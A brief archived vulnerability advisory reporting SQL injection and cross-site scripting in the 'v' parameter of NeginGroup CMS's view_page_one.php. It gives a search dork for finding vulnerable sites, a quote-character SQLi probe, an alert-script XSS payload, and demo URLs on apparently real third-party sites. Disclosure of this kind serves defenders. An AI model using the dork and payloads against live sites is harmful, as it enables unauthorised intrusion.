NeginGroup CMS Sql Injection / XSS

2014-05-29 / 2014-05-30
Credit: Hekt0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89
Dork: inurl:/view_page_one.php?v= OR intext:www.NeginGroup.com

[+] Title: Sql Injection / Xss on NeginGroup CMS [+] Date: 2014/5/29 [+] Author: Hekt0r [+] Vendor Homepage: www.NeginGroup.com [+] Tested on: Windows 7 & Kali Linux [+] Vulnerable File: /view_page_one.php [+} Dork : intext:www.NeginGroup.com inurl:/view_page_one.php?v= ### Exploitation: [+] Exploit Sql Injection: http://site/view_page_one.php?v=[SQL-Injection] [+] Exploit Xss: http://site/view_page_one.php?v=[Xss] ### Demo: [+] Sqli:http://www.irXantwins.com/view_page_one.php?v=1' http://jovaincXo.com/view_page_one.php?v=3' [+] Xss: http://www.irantXwins.com/view_page_one.php?v=<script>alert(/Xss/)</script> http://jovaincXo.com/view_page_one.php?v=<script>alert(/Xss/)</script> [+] Special Thanks: Root SmasheR,Mr.Moein,UmPire,Saeed.Jok3r,M4hdi,ALIREZA_PROMIS,LiNuX-LoVeR And All members of Iran Security Group [+] iransec.net


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top